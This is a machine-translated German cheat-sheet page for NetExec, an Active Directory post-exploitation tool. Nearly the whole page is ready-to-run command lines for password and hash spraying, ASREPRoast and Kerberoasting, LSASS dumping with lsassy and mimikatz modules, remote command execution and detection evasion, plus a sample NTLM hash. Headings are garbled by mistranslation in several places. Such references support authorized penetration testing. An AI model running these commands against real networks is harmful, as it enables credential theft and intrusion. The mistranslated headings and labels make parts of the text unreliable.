NetExec
📋 Kopieren Sie alle Befehle
📄 PDF generieren
NetExec (früher CrackMapExec) ist ein Post-Exploitation-Tool, das hilft, die Sicherheit von großen Active Directory-Netzwerken durch Netzwerkprotokoll Missbrauch und Anmeldeangriffe zu automatisieren.
Installation und Inbetriebnahme
Command
Description
pip3 install netexecInstall NetExec via pip
pipx install netexecInstall with pipx (recommended)
git clone https://github.com/Pennyw0rth/NetExec.gitClone from GitHub
cd NetExec && pip3 install .Install from source
netexec --versionCheck installed version
netexec --helpDisplay help information
Basisnutzung
Command
Description
netexec smb 192.168.1.0/24Scan SMB on subnet
netexec smb 192.168.1.100 -u username -p passwordAuthenticate with credentials
netexec smb 192.168.1.100 -u username -H ntlmhashAuthenticate with NTLM hash
netexec smb 192.168.1.100 -u '' -p ''Anonymous authentication
netexec smb targets.txt -u username -p passwordUse target file
Unterstützung des Protokolls
SMB-Protokoll
Command
Description
netexec smb 192.168.1.100Basic SMB enumeration
netexec smb 192.168.1.100 --sharesEnumerate shares
netexec smb 192.168.1.100 --usersEnumerate users
netexec smb 192.168.1.100 --groupsEnumerate groups
netexec smb 192.168.1.100 --local-groupsEnumerate local groups
netexec smb 192.168.1.100 --sessionsEnumerate sessions
netexec smb 192.168.1.100 --disksEnumerate disks
WinRM Protokoll
Command
Description
netexec winrm 192.168.1.100 -u username -p passwordWinRM authentication
netexec winrm 192.168.1.100 -u username -p password -x "whoami"Execute command
netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1Execute PowerShell script
LDAP-Protokoll
Command
Description
netexec ldap 192.168.1.100 -u username -p passwordLDAP authentication
netexec ldap 192.168.1.100 -u username -p password --usersEnumerate LDAP users
netexec ldap 192.168.1.100 -u username -p password --groupsEnumerate LDAP groups
netexec ldap 192.168.1.100 -u username -p password --computersEnumerate computers
MSSQL Protokoll
Command
Description
netexec mssql 192.168.1.100 -u username -p passwordMSSQL authentication
netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version"Execute SQL query
netexec mssql 192.168.1.100 -u username -p password --local-authLocal authentication
SSH-Protokoll
Command
Description
netexec ssh 192.168.1.100 -u username -p passwordSSH authentication
netexec ssh 192.168.1.100 -u username -k id_rsaSSH key authentication
netexec ssh 192.168.1.100 -u username -p password -x "id"Execute command
Authentifizierungsmethoden
Passwort Authentication
Command
Description
netexec smb 192.168.1.100 -u username -p passwordSingle credential
netexec smb 192.168.1.100 -u users.txt -p passwords.txtCredential lists
netexec smb 192.168.1.100 -u username -p passwords.txtPassword spraying
netexec smb 192.168.1.100 -u users.txt -p passwordUser enumeration
Hash Authentication
Command
Description
netexec smb 192.168.1.100 -u username -H ntlmhashNTLM hash
netexec smb 192.168.1.100 -u username -H lmhash:ntlmhashLM:NTLM hash
netexec smb 192.168.1.100 -u users.txt -H hashes.txtHash lists
Kerberos Authentication
Command
Description
netexec smb 192.168.1.100 -u username -p password -kKerberos authentication
netexec smb 192.168.1.100 -u username --use-kcacheUse Kerberos cache
netexec smb 192.168.1.100 -u username -p password --kerberosForce Kerberos
Aufzählung
Aktienzählung
Command
Description
netexec smb 192.168.1.100 --sharesList shares
netexec smb 192.168.1.100 --shares -u username -p passwordAuthenticated share listing
netexec smb 192.168.1.100 --spider SHARESpider share contents
netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt"Search for files
Benutzeraufzählung
Command
Description
netexec smb 192.168.1.100 --usersEnumerate users
netexec smb 192.168.1.100 --rid-bruteRID bruteforce
netexec smb 192.168.1.100 --users --rid-brute 1000-2000RID range
Gruppenaufzählung
Command
Description
netexec smb 192.168.1.100 --groupsEnumerate groups
netexec smb 192.168.1.100 --local-groupsLocal groups
netexec smb 192.168.1.100 --groups "Domain Admins"Specific group
Computeraufzählung
Command
Description
netexec ldap 192.168.1.100 --computersEnumerate computers
netexec smb 192.168.1.100 --computersSMB computer enumeration
Ausführung des Befehls
SMB Command Execution
Command
Description
netexec smb 192.168.1.100 -u username -p password -x "whoami"Execute command
netexec smb 192.168.1.100 -u username -p password -X script.ps1Execute PowerShell script
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexecUse WMI execution
netexec smb 192.168.1.100 -u username -p password --exec-method smbexecUse SMB execution
WinRM Command Execution
Command
Description
netexec winrm 192.168.1.100 -u username -p password -x "Get-Process"PowerShell command
netexec winrm 192.168.1.100 -u username -p password -X script.ps1Execute script
Module
Eingebaute Module
Command
Description
netexec smb 192.168.1.100 -M spider_plusEnhanced spidering
netexec smb 192.168.1.100 -M enum_avproductsEnumerate AV products
netexec smb 192.168.1.100 -M gpp_passwordGroup Policy Preferences
netexec smb 192.168.1.100 -M lsassyLSASS dumping
netexec smb 192.168.1.100 -M mimikatzMimikatz execution
Moduloptionen
Command
Description
netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=falseModule options
netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=trueBloodhound output
Datenbanken
Command
Description
netexec smb 192.168.1.100 --users --export users.csvExport to CSV
netexec dbDatabase management
netexec db --workspace defaultSet workspace
netexec db --clear-databaseClear database
Erweiterte Funktionen
Credential Stuffing
Command
Description
netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-successContinue on success
netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3Fail limit
Passwort vergessen?
Command
Description
netexec smb 192.168.1.100 --pass-polGet password policy
netexec ldap 192.168.1.100 --pass-polLDAP password policy
Bluthobel Integration
Command
Description
netexec ldap 192.168.1.100 -u username -p password --bloodhoundCollect Bloodhound data
netexec ldap 192.168.1.100 -u username -p password --bloodhound -c AllAll collections
ASREPRoast
Command
Description
netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txtASREPRoast attack
netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txtAuthenticated ASREPRoast
Kerberoasen
Command
Description
netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txtKerberoasting attack
Ausgabe und Logging
Command
Description
netexec smb 192.168.1.100 --verboseVerbose output
netexec smb 192.168.1.100 --debugDebug output
netexec smb 192.168.1.100 -o output.txtSave output to file
netexec smb 192.168.1.100 --log logs/Log directory
Konfiguration
Config File (~/.nxc/nxc.conf)
ini
[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0_
Protokollspezifische Optionen
Command
Description
netexec smb 192.168.1.100 --port 445Custom port
netexec smb 192.168.1.100 --timeout 5Connection timeout
netexec smb 192.168.1.100 --threads 100Thread count
Evasion Techniken
Command
Description
netexec smb 192.168.1.100 --jitter 1-5Random delay
netexec smb 192.168.1.100 --delay 2Fixed delay
netexec smb 192.168.1.100 --obfsObfuscation
Gemeinsame Angriffsszenarien
Domain Enumeration
```bash
Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers
Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares
Password policy
netexec smb dc.domain.com -u username -p password --pass-pol
```_
Credential Attacks
```bash
Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success
Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76
ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt
```_
Post-Exploitation
```bash
Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"
LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy
Bloodhound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All
```_
Impacket Integration
Command
Description
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexecUse Impacket WMI
netexec smb 192.168.1.100 -u username -p password --exec-method smbexecUse Impacket SMB
Crackmapexemplar Migration
Command
Description
netexec --convert-cme-dbConvert CME database
alias cme='netexec'Create alias for compatibility
Fehlerbehebung
Command
Description
netexec --helpGeneral help
netexec smb --helpProtocol-specific help
netexec -vVersion information
netexec --debug smb 192.168.1.100Debug mode
Best Practices
Verwenden Sie die Authentifizierung vor der Aufzählung, wenn möglich
Durchführung richtiger Verzögerungen, um die Erkennung zu vermeiden
Verwenden Sie Workspaces, um verschiedene Engagements zu organisieren
Exportergebnisse für weitere Analysen
Kombinieren Sie mit anderen Instrumenten zur umfassenden Bewertung
Monitor für defensive Antworten
Verwenden Sie entsprechende Gewindezählungen, um überwältigende Ziele zu vermeiden
Durchführung der richtigen Protokollierung
Validierung von Anmeldeinformationen vor groß angelegten Angriffen
Benutzen Sie obfuscation Techniken, wenn nötig
Sicherheitsüberlegungen
Nur Nutzung in autorisierten Netzwerken
Implementierung richtiger Zugriffskontrollen
Monitor zum Nachweis von Sicherheitswerkzeugen
Wenigstens Privilegien verwenden
Dokumentation aller Tätigkeiten für die Einhaltung
Koordination mit blauem Team, wenn zutreffend
Durchführung richtiger Reinigungsverfahren
Anmeldeinformationen sicher speichern
Verschlüsselte Kommunikation verwenden, wenn möglich
Regelmäßige Updates zur Aufrechterhaltung der Wirksamkeit